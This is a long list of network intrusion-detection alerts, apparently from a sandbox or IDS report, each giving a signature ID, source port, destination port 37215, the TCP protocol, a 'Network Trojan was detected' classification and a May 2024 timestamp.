                SID:2835222
                Source Port:58618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674957
                SID:2835222
                Source Port:48906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909875
                SID:2829579
                Source Port:57918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329558
                SID:2829579
                Source Port:46512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281627
                SID:2829579
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177263
                SID:2829579
                Source Port:48714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611034
                SID:2835222
                Source Port:45020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286925
                SID:2829579
                Source Port:59164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591037
                SID:2835222
                Source Port:50672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965574
                SID:2829579
                Source Port:53006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042060
                SID:2829579
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523784
                SID:2835222
                Source Port:45658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371562
                SID:2829579
                Source Port:55702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507004
                SID:2835222
                Source Port:46928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209843
                SID:2829579
                Source Port:49410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855810
                SID:2835222
                Source Port:36408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322248
                SID:2835222
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878817
                SID:2835222
                Source Port:53474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231272
                SID:2829579
                Source Port:39598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228515
                SID:2829579
                Source Port:46430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434408
                SID:2835222
                Source Port:60460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900582
                SID:2829579
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840813
                SID:2835222
                Source Port:60884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136977
                SID:2835222
                Source Port:35938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784836
                SID:2835222
                Source Port:50168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717152
                SID:2829579
                Source Port:55184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071543
                SID:2829579
                Source Port:33922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872736
                SID:2835222
                Source Port:35078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.829221
                SID:2835222
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284537
                SID:2829579
                Source Port:45716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182749
                SID:2835222
                Source Port:33458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868887
                SID:2835222
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798500
                SID:2835222
                Source Port:35212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737130
                SID:2835222
                Source Port:36640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035374
                SID:2829579
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141877
                SID:2835222
                Source Port:55722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464838
                SID:2829579
                Source Port:58006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.114171
                SID:2835222
                Source Port:54096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983750
                SID:2835222
                Source Port:39170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550649
                SID:2829579
                Source Port:45934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916245
                SID:2829579
                Source Port:43366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038133
                SID:2835222
                Source Port:58826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994661
                SID:2835222
                Source Port:45812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178474
                SID:2829579
                Source Port:33298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947186
                SID:2829579
                Source Port:56016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561967
                SID:2835222
                Source Port:47136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808641
                SID:2829579
                Source Port:56330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226788
                SID:2829579
                Source Port:41386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520351
                SID:2835222
                Source Port:35154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160939
                SID:2835222
                Source Port:51758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929219
                SID:2829579
                Source Port:49068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070286
                SID:2829579
                Source Port:58712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228132
                SID:2835222
                Source Port:56644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464619
                SID:2835222
                Source Port:40202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986745
                SID:2829579
                Source Port:38256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013781
                SID:2835222
                Source Port:39726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209287
                SID:2835222
                Source Port:46380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277610
                SID:2835222
                Source Port:44916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890928
                SID:2835222
                Source Port:54008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765654
                SID:2829579
                Source Port:40766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325968
                SID:2835222
                Source Port:40060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149980
                SID:2829579
                Source Port:45762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811591
                SID:2829579
                Source Port:58806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212824
                SID:2829579
                Source Port:40302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660378
                SID:2829579
                Source Port:50448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656017
                SID:2835222
                Source Port:59272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843569
                SID:2829579
                Source Port:38488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871860
                SID:2835222
                Source Port:36264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076402
                SID:2829579
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935169
                SID:2835222
                Source Port:36472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319456
                SID:2829579
                Source Port:37168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.569613
                SID:2835222
                Source Port:51416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944117
                SID:2829579
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243000
                SID:2829579
                Source Port:44076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508997
                SID:2829579
                Source Port:39966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726077
                SID:2829579
                Source Port:46690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562102
                SID:2835222
                Source Port:36824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694640
                SID:2835222
                Source Port:53726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324262
                SID:2829579
                Source Port:46462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418684
                SID:2829579
                Source Port:47730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593578
                SID:2829579
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687801
                SID:2835222
                Source Port:36484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872935
                SID:2835222
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966221
                SID:2835222
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163399
                SID:2835222
                Source Port:43410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687218
                SID:2835222
                Source Port:58626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227552
                SID:2835222
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364854
                SID:2835222
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522397
                SID:2829579
                Source Port:49776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154566
                SID:2829579
                Source Port:59106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164776
                SID:2829579
                Source Port:47098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780568
                SID:2835222
                Source Port:35836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868928
                SID:2829579
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942736
                SID:2829579
                Source Port:54238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228103
                SID:2835222
                Source Port:46222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179541
                SID:2835222
                Source Port:53806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450166
                SID:2829579
                Source Port:53448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028053
                SID:2835222
                Source Port:44632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534787
                SID:2829579
                Source Port:39346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611272
                SID:2835222
                Source Port:51722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073755
                SID:2829579
                Source Port:56352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.167441
                SID:2829579
                Source Port:42078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575109
                SID:2835222
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868196
                SID:2835222
                Source Port:50652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896165
                SID:2829579
                Source Port:36008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713714
                SID:2835222
                Source Port:52030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015425
                SID:2829579
                Source Port:45052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795923
                SID:2835222
                Source Port:45740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776525
                SID:2835222
                Source Port:48108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499443
                SID:2835222
                Source Port:38874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328279
                SID:2829579
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559371
                SID:2829579
                Source Port:46278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766916
                SID:2829579
                Source Port:36170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572049
                SID:2835222
                Source Port:51302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899346
                SID:2835222
                Source Port:50032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597814
                SID:2829579
                Source Port:52390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721029
                SID:2835222
                Source Port:50520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555532
                SID:2829579
                Source Port:52622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470328
                SID:2835222
                Source Port:42676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228394
                SID:2829579
                Source Port:41704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666739
                SID:2829579
                Source Port:57896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902028
                SID:2835222
                Source Port:52508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227073
                SID:2835222
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070361
                SID:2835222
                Source Port:39696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060833
                SID:2835222
                Source Port:52054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361804
                SID:2835222
                Source Port:46192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638933
                SID:2835222
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763065
                SID:2835222
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226579
                SID:2835222
                Source Port:34798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612003
                SID:2835222
                Source Port:58256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913765
                SID:2835222
                Source Port:53134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798104
                SID:2835222
                Source Port:40416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044578
                SID:2835222
                Source Port:60776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965308
                SID:2829579
                Source Port:38982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.215543
                SID:2829579
                Source Port:43338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926332
                SID:2835222
                Source Port:50002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042579
                SID:2835222
                Source Port:41854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062585
                SID:2829579
                Source Port:57850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626845
                SID:2835222
                Source Port:41780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279195
                SID:2835222
                Source Port:40180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786735
                SID:2829579
                Source Port:56574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629720
                SID:2835222
                Source Port:38274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712960
                SID:2829579
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900221
                SID:2835222
                Source Port:36008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008550
                SID:2829579
                Source Port:38042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740408
                SID:2835222
                Source Port:35240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969851
                SID:2829579
                Source Port:51672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026512
                SID:2835222
                Source Port:37738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531584
                SID:2835222
                Source Port:58982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798070
                SID:2829579
                Source Port:47844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765692
                SID:2829579
                Source Port:42476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840238
                SID:2829579
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227370
                SID:2829579
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639640
                SID:2835222
                Source Port:39366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534829
                SID:2829579
                Source Port:50908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422426
                SID:2829579
                Source Port:44488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162254
                SID:2829579
                Source Port:45932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914882
                SID:2835222
                Source Port:39466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521145
                SID:2835222
                Source Port:34768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279175
                SID:2835222
                Source Port:44108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263135
                SID:2835222
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226617
                SID:2829579
                Source Port:50862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712109
                SID:2835222
                Source Port:49516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032891
                SID:2835222
                Source Port:57302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948915
                SID:2829579
                Source Port:42508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814665
                SID:2835222
                Source Port:56796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728793
                SID:2829579
                Source Port:53724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730439
                SID:2835222
                Source Port:53070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734509
                SID:2829579
                Source Port:48578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618500
                SID:2829579
                Source Port:34938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853904
                SID:2835222
                Source Port:45524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683972
                SID:2829579
                Source Port:33866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.241891
                SID:2829579
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989923
                SID:2835222
                Source Port:58870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651913
                SID:2835222
                Source Port:57682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882856
                SID:2835222
                Source Port:59374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318758
                SID:2835222
                Source Port:33382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966834
                SID:2835222
                Source Port:34638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182697
                SID:2829579
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435041
                SID:2829579
                Source Port:33602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209524
                SID:2835222
                Source Port:36408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802362
                SID:2829579
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864401
                SID:2835222
                Source Port:45724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911880
                SID:2829579
                Source Port:52330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654524
                SID:2835222
                Source Port:43720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507183
                SID:2835222
                Source Port:52704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438760
                SID:2829579
                Source Port:43140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111057
                SID:2835222
                Source Port:46570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228208
                SID:2835222
                Source Port:34100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418658
                SID:2835222
                Source Port:41182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613243
                SID:2829579
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338989
                SID:2835222
                Source Port:55396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285677
                SID:2835222
                Source Port:34418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855991
                SID:2829579
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816998
                SID:2835222
                Source Port:38220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558141
                SID:2829579
                Source Port:58044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931915
                SID:2829579
                Source Port:58302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614220
                SID:2829579
                Source Port:45882
                Destination Port:37215
